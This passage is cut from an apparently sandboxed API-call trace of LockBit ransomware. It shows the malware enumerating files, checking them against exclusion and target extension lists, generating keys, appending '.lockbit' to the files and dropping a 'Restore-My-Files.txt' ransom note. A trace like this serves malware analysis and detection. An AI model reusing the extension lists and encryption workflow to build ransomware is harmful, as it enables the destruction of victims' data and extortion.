Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.369] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x178d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382950.JPG", cAlternateFileName="")) returned 1 [0160.369] lstrcmpiW (lpString1=".", lpString2="J0382950.JPG") returned -1 [0160.369] lstrcmpiW (lpString1="..", lpString2="J0382950.JPG") returned -1 [0160.369] PathFindExtensionW (pszPath="J0382950.JPG") returned=".JPG" [0160.369] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.369] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.369] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.370] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.370] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.371] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.371] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.371] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382950.JPG") returned 1 [0160.371] lstrcmpiW (lpString1="ntldr", lpString2="J0382950.JPG") returned 1 [0160.371] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382950.JPG") returned 1 [0160.371] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382950.JPG") returned -1 [0160.371] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382950.JPG") returned -1 [0160.371] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382950.JPG") returned 1 [0160.371] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382950.JPG") returned -1 [0160.371] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.371] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG") returned=".JPG" [0160.371] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.371] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.371] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.371] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.372] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.372] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.372] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.372] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.372] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG.lockbit") returned 72 [0160.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382950.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.374] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.374] malloc (_Size=0x40068) returned 0x3df0008 [0160.375] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=96466) returned 1 [0160.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.376] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.380] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.382] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.382] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0160.382] free (_Block=0x1fa2ed8) [0160.382] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.382] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.382] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661d4d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17749, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382952.JPG", cAlternateFileName="")) returned 1 [0160.382] lstrcmpiW (lpString1=".", lpString2="J0382952.JPG") returned -1 [0160.382] lstrcmpiW (lpString1="..", lpString2="J0382952.JPG") returned -1 [0160.382] PathFindExtensionW (pszPath="J0382952.JPG") returned=".JPG" [0160.382] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.382] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.383] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.383] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382952.JPG") returned 1 [0160.384] lstrcmpiW (lpString1="ntldr", lpString2="J0382952.JPG") returned 1 [0160.384] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382952.JPG") returned 1 [0160.384] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382952.JPG") returned -1 [0160.384] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382952.JPG") returned -1 [0160.384] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382952.JPG") returned 1 [0160.384] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382952.JPG") returned -1 [0160.384] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.384] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG") returned=".JPG" [0160.384] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.384] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.384] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.385] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.385] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.385] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG.lockbit") returned 72 [0160.385] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382952.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.386] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.387] malloc (_Size=0x40068) returned 0x3df0008 [0160.387] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=96073) returned 1 [0160.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.388] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.395] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.395] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0160.395] free (_Block=0x1fa2ed8) [0160.396] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.396] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.396] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.396] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x15a7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382954.JPG", cAlternateFileName="")) returned 1 [0160.396] lstrcmpiW (lpString1=".", lpString2="J0382954.JPG") returned -1 [0160.396] lstrcmpiW (lpString1="..", lpString2="J0382954.JPG") returned -1 [0160.396] PathFindExtensionW (pszPath="J0382954.JPG") returned=".JPG" [0160.396] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.396] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.396] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.397] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.397] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.398] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.398] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.398] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.398] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.398] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382954.JPG") returned 1 [0160.398] lstrcmpiW (lpString1="ntldr", lpString2="J0382954.JPG") returned 1 [0160.398] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382954.JPG") returned 1 [0160.398] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382954.JPG") returned -1 [0160.398] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382954.JPG") returned -1 [0160.398] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382954.JPG") returned 1 [0160.398] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382954.JPG") returned -1 [0160.398] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.398] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG") returned=".JPG" [0160.398] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.398] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".dbv", 